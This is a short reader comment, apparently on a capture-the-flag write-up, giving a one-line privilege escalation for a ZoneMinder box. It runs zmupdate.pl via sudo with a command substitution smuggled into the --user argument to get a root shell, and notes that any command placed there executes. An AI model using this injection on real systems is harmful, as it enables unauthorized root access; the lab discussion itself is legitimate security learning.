I just solved the box using following command:

"sudo /usr/bin/zmupdate.pl --version=1 --user='$(/bin/bash -i)' --pass=ZoneMinderPassword2023".

This command directly spawn a shell with root privileges, providing a simpler and cleaner method for privilege escalation.

The key aspect of this vulnerability is you can insert any command within the $() variable and the binary will execute it. This information should be included in your post to clarify for readers that the solution is not limited to executing a reverse shell using busybox.

However, great post. Keep up the good work.